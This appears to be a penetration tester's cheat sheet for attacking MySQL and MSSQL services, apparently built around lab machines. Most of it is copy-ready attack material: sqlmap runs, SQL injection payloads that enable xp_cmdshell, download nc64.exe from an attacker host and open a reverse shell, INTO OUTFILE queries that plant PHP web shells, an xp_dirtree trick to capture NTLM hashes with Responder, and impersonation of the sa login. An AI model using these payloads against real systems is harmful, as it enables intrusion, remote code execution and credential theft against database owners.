SQLMap
SQLMAP example:
Copy sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3
By default, MSSQL uses ports TCP/1433
and UDP/1434
, and MySQL uses TCP/3306
. However, when MSSQL operates in a "hidden" mode, it uses the TCP/2433
port.
Connecting to SQL service
To connect to mysql:
Copy mysql -u julio -pPassword123 -h 10.129.20.13
On windows:
Copy sqlcmd -S SRVMSSQL -U julio -P 'MyPassword!' -y 30 -Y 30
To connect to mssql:
Copy sqsh -S 10.129.203.7 -U julio -P 'MyPassword!' -h
-windows-auth for alternative authentication
Copy mssqlclient.py -p 1433 julio@10.129.203.7
Default Databases
MySQL
default system schemas/databases:
mysql
- is the system database that contains tables that store information required by the MySQL server
information_schema
- provides access to database metadata
performance_schema
- is a feature for monitoring MySQL Server execution at a low level
sys
- a set of objects that helps DBAs and developers interpret data collected by the Performance Schema
MSSQL
default system schemas/databases:
master
- keeps the information for an instance of SQL Server.
msdb
- used by SQL Server Agent.
model
- a template database copied for each new database.
resource
- a read-only database that keeps system objects visible in every database on the server in sys schema.
tempdb
- keeps temporary objects for SQL queries.
RCE
MSSQL
For MSSQL on windows we can run any code in SQL injection: To get RCE:
Copy ';EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;--
';EXEC xp_cmdshell "powershell wget http://<ip>/nc64.exe -o C:\Users\Public\nc64.exe";--
';EXEC xp_cmdshell "C:\Users\Public\nc64.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.245 4444";--
Using Public folder as we know it is writeable by all users.
Copy EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE;
EXEC xp_cmdshell "powershell wget http://<ip>/nc64.exe -o C:\Users\Public\nc64.exe";
EXEC xp_cmdshell "C:\Users\Public\nc64.exe -t -e C:\Windows\System32\cmd.exe <ip> <port>";
MySQL
We can write a php file that will lead to command execution via a Web Application
Copy SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE "/var/www/html/webshell.php"
or with union:
Copy ' union select '<?php system($_GET["cmd"]); ?>' into outfile '/srv/http/shell.php' -- -
Windows:
Copy SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE "C:/wamp/www/shell.php"
Useful Commands
To check C directory:
Copy exec xp_dirtree 'c:\'
To list databases:
Copy SELECT name FROM master.dbo.sysdatabases
To show tables
Copy SELECT table_name FROM <DATABASE>.INFORMATION_SCHEMA.TABLES
To concatenate columns:
Copy union select 1,concat(username,':',password),3,4,5,6 from users--
To show tables and their id:
Copy union select 1,(select string_agg(concat(name,':',id),'|') from streamio..sysobjects where xtype='u'),3,4,5,6-- -
To test xp_cmdshell:
Copy EXEC xp_cmdshell 'ping 10.10.14.8';
On target:
Copy sudo tcpdump -i tun0 icmp
To Write a file:
Copy SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php' ;
Copy SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
To get hash:
Target:
Copy EXEC master ..xp_dirtree '\\10.10.14.113\share\'
Attacker:
Copy sudo responder -A -I tun0
Impersonation:
Check users we can impersonate:
Copy SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
To impersonate:
Copy EXECUTE AS LOGIN = 'sa' SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER ( 'sysadmin' )
Verifying current user and role:
Copy 1 > SELECT SYSTEM_USER
2 > SELECT IS_SRVROLEMEMBER ( 'sysadmin' )
3 > go
Linked Database
Copy SELECT srvname, isremote FROM sysservers
Enable xp_cmdshell
Copy EXEC master.dbo.sp_configure 'show advanced options', 1;
RECONFIGURE;